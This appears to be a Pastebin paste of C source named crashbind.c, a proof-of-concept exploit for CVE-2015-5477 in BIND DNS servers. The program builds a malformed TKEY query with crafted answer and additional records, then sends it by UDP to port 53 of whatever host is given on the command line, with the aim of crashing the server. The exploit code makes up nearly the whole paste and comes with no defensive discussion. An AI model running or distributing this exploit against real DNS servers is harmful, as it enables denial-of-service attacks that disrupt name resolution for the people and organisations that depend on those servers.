Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // crashbind.c
- // CVE-2015-5477
- // Versions Affected: 9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2
- #include <stdio.h>
- #include <stdlib.h>
- #include <stdint.h>
- #include <unistd.h>
- #include <time.h>
- #include <errno.h>
- #include <string.h>
- #include <netdb.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- struct DNS_HEADER
- {
- unsigned short id;
- unsigned char rd :1;
- unsigned char tc :1;
- unsigned char aa :1;
- unsigned char opcode :4;
- unsigned char qr :1;
- unsigned char rcode :4;
- unsigned char cd :1;
- unsigned char ad :1;
- unsigned char z :1;
- unsigned char ra :1;
- unsigned short q_count;
- unsigned short ans_count;
- unsigned short auth_count;
- unsigned short add_count;
- } __attribute__((packed));
- struct DNS_QUESTION
- {
- char qname[12];
- uint16_t qtype;
- uint16_t qclass;
- } __attribute__((packed));
- struct DNS_ANSWER
- {
- char name[12];
- uint16_t type;
- uint16_t class;
- uint32_t ttl;
- uint16_t rdlength; // Set to 4
- uint8_t data[4];
- } __attribute__((packed));
- struct mal_query {
- struct DNS_HEADER header;
- struct DNS_QUESTION question;
- struct DNS_ANSWER answer[2];
- } __attribute__((packed));
- int
- main(int argc, char **argv)
- {
- int fd = 0;
- struct addrinfo hints, *servinfo;
- int rv = -1;
- struct mal_query mq;
- srand(time(0));
- memset(&hints, 0x0, sizeof(hints));
- hints.ai_family = AF_UNSPEC;
- hints.ai_socktype = SOCK_DGRAM;
- if ((rv = getaddrinfo(argv[1], "53", &hints, &servinfo)) != 0) {
- fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rv));
- exit(EXIT_FAILURE);
- }
- /* Note: if the hostname has a v6 address and the server isn't listening on
- * it, it will fail to connect */
- if ((fd = socket(servinfo->ai_family, servinfo->ai_socktype, servinfo->ai_protocol)) < 0) {
- perror("socket");
- exit(EXIT_FAILURE);
- }
- memset(&mq, 0x0, sizeof(mq));
- /* Header */
- mq.header.id = htons((uint16_t)rand());
- mq.header.rd = 1;
- mq.header.opcode = 0x0;
- mq.header.qr = 0;
- mq.header.q_count = htons(1);
- mq.header.ans_count = htons(1);
- mq.header.add_count = htons(1);
- /* Question */
- strcpy(mq.question.qname, "\x06google\x03\x63om");
- mq.question.qtype = htons(249);
- mq.question.qclass = htons(0x1);
- /* Answer */
- strcpy(mq.answer[0].name, "\x06google\x03\x63om");
- mq.answer[0].type = htons(0x0001);
- mq.answer[0].class = htons(0x0001);
- mq.answer[0].rdlength = htons(4);
- /* Additional */
- strcpy(mq.answer[1].name, "\x06google\x03\x63om");
- mq.answer[1].type = htons(0x0001);
- mq.answer[1].class = htons(0x0001);
- mq.answer[1].rdlength = htons(4);
- if (sendto(fd, &mq, sizeof(mq), 0, servinfo->ai_addr, servinfo->ai_addrlen) < 0) {
- perror("sendto");
- exit(EXIT_FAILURE);
- }
- freeaddrinfo(servinfo);
- return EXIT_SUCCESS;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement